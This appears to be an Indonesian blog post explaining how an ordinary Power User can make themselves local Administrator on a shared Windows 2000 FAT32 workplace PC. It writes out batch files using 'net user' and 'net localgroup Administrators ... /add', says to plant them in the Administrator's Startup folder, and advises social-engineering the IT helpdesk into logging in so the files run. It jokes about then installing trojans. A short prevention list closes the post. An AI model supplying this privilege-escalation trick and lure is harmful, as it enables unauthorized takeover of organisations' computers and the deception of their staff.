Buat hack Admin Komputer
Pada artikel ini ditunjukkan bagaimana trik menjadi administrator hanya dengan beberapa langkah sederhana. Perpaduan teknik hacking, yaitu membuat batch file dan social engineering (kalo diterjemahkan dalam bahasa sehari-hari artinya “NEPU”)
Cek terlebih dahulu permission (group user) anda:
Langkah yang perlu dilakukan adalah sbb:
Start > Run > CMD , gue ketik deh ; net user
Hasilnya:
C:\Documents and Settings\RISKI>net use
User accounts for \\UNKNOWN
——————————————————————————-
__vmware_user__ Administrator Guest
HelpAssistant RISKI SUPPORT_388945a0
The command completed successfully.
Aha! ternyata account gue udah di daftarin di local acount sama admin gue nih, jadi waktu gue login domain di PC ini sudah terdaftar juga di local account, entah PANGKAT apa yang admin kasih ke gue, sebaiknya gue cek dulu deh pake net user, Start > Run > CMD, gue ketik lagi; net user RISKI
C:\Documents and Settings\RISKI>net user riski
User name RISKI
Full Name
Comment
User’s comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/21/2005 9:12 AM
Password expires Never
Password changeable 6/21/2005 9:12 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/19/2005 10:10 PM
Logon hours allowed All
Local Group Memberships *Power User
Global Group memberships *None
The command completed successfully.
Ternyata bener dugaan gue, si admin cuma ngasih gue PANGKAT Power User, yang udah pasti punya hak yang sangat terbatas dan minim, terutama buat gue lah! ? sampe sampe gue gak bisa nginstal program2 kesayangan gue ? hemm…. Tunggu aja luh admin brengsek dan pelit, tunggu aja tanggal mainnya! He..he..h.e……
Setelah cek & ricek ternyata Win2000 telah di instal sang admin dengan File System FAT32, huh dasar males mungkin dia formatnya pake Disk Manager kali yak! Yang partisi dan formatnya sekaligus dan lebih cepet tapi sayangnya gak bisa ngasih file system NTFS yang sebenarnya encrytpsi datanya jauh lebih bagus dari pada FAT32, kenapa gue bilang begitu? salah satu contohnya adalah dalam FAT32 seluruh user yang login pada OS tersebut dapat mengakses setiap profile yang ada di bawah direktori document and settings termasuk seluruh direktory pada profile sang ADMINISTRATOR ? aha.. lubang kecil yang amat bagus untuk di exploitasi bukan? Bah bagaimna pula diexploitasinya nih?…
Oke sekarang kita akan mencoba membuat account yang kita punya menjadi account Maha Dewa ? yaitu administrator dengan memanfaatkan celah kecil yang ada,
1. Pertama kita buat batch file untuk mendaftarkan local account kita untuk dijadikan account Maha Dewa yaitu ADMINISTRATOR alias sang pengatus semuanya gitu loh!
Kita gunakan command net localgroup, perhatikan batch file di bawah ini
———————————-start——————————
@echo off
net localgroup Administrators RISKI /add
exit
———————————-end—————————–
ketikkan script tersebut di notepad lalu save as dengan nama admin.bat
2. Yang kedua ini adalah bagian yang paling penting yaitu menaruh file ini agar di exekusi oleh sang admin, karena perintah ini dapat berjalan dengan sempurna hanya oleh sang dewa, tenaaanggg!!! Sebentar lagi kita akan mempunya POWER yang sama dengan si doi sang Admin yang PeLiT he..h.e…he…he..
Karena kita di izinkan untuk menjelajah kemana saja pada file system ini, maka sisipkan admin.bat pada direktori startUp administrator pada alamat berikut ;
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
Nah betul sekali dugaan anak gaul sekalian, jadi program itu akan segera di eksekusi secara otomatis begitu sang admin login dengan accountnya, maka seketika itu account RISKI yang cuma punya pangkat Power User maka pada saat itu juga RISKI sekaligus mempunya 2 pangkat, yaitu Power User dan Adminsitrators he…he…. Ketika kita menjadi sang Maha Dewa, you know what should you do next! ?
FYI, jika kita belum terdaftar pada local account (ketika kita cek dengan net user ternyata tidak ada user name kita waktu login) maka script batch filenya kita rubah sedikit dengan tambahan mendaftarkan username kita kedalam local account, baru setelah itu bisa kita naikkan pangkatnya menjadi Administrators, modifikasinya adalah sebagai berikut:
———————————–start———————————
@echo off
net user user_name_kamu /add
net localgroup Administrator user_name_kamu /add
exit
————————————end———————————
Nah setelah semuanya siap lakukan lah hal yang telah di jelaskan pada langkah kedua, maka kita hanya cuma menunggu sang admin login dengan account adminsitratornya, (waduh kapan nih si doi login dan kemakan perangkap gue?…. bisa botak nih nunggunya!) saran gue sih cuma 1 do it the Social Engineering dwonk!! Masak gitu aja bingung? Pancing si admin supaya dia login di profile adminya, sepengalaman gue sih kalo kita ada kerusakan atau masalah kecil si IT Helpdesk login admin dulu untuk ngecek segala sesuatunya, maklum kalo login di user biasa serba terbatas hi…hi…hi..hi… jadi dari modal pengalam gue mudah mudahan muncul ide ide social engineering yang lebih oke biar si admin kena jebakan kita… dan kalo udah berhasil jangan melakukan hal2 yang destruktif dan merugikan orang lain yang instal AAtolls buat scaning PC si admin wakakakkakak…… atau instal Trojan Client di situ yang nanti servernya di kirim via network atau email ke admin! Duh berdosalah aku kalo gitu yang turut membantu niat jelekmu!
“Merusak pekerjaan banyak orang, memperbaiki pekerjaan segelintir orang, mudah -mudahan komunitas ini menjadi segelintir orang itu, amieenn….”
Artikel ringan ini cuma buat para newbies aja yang kesel sama tindakan admin yang semena mena dan tidak adil, setidaknya ada beberapa pelajaran yang dapat di petik walaupun sesederhana apapun, mudahan dapat menjadi pelajaran yang berharaga. Berikut ini pencegahan yang perlu di lakukan:
1. Enkripsi NTFS lebih baik dari pada FAT32 terutama untuk sekurity dan manajemen file. (oh iya!.. walaupun pake NTFS kita bisa manfaatin autoexec.bat lhoo… untuk eksekusi file admin.bat tadi he..he..he… No Perfect System In The World Man!! )
2. Sebaiknya Proteksi program program administrasi berikut ini;
Regedit, MSCONFIG, GPEDIT.MSC, CommandPromt dan semua program administrasi lainnya yang memungkinkan user memicu file2 kurang ajar di exekusi OS secara otomatis, sengaja ataupun tidak di sengaja.
3. Password BIOS, dan set boot sequence hanya dari hardiks saja, ini mencegah user tidak bisa booting dengan device lain, karena banyak program bertebaran untuk mereset password sang mahadewa, salah satu contohnya dengan Offline NT Password Recovery. (kecuali user nekad banged mencopot baterai CMOS dengan membongkar PC, gile usaha banged dah!!!)
4. Untuk sang admin, sering sering di cek donk kalo ke usernya, kalo udah kecolongan cepet2 di turunin lagi tuh pangkatnya, dan yang sering banget kejadian nih buat temen2 gue kalo login admin, DI LOG OUT DONK!!!!!! jangan ditinggal gitu aza!
Tidak ada komentar:
Posting Komentar